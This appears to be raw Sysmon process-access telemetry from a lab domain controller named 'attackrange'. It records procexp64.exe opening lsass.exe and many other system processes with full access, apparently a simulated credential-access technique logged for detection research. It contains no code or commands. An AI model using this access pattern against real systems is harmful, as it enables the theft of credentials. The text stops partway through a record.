|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788329Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788328Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788327Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788326Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788325Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788324Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788323Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788322Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788321Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788320Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788319Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788318Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788317Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788316Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788315Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788314Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788313Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788312Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788311Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788310Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788309Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788308Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788307Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788306Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788305Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788304Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788303Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788302Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788535Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788534Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788533Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788532Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788531Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788530Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788529Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 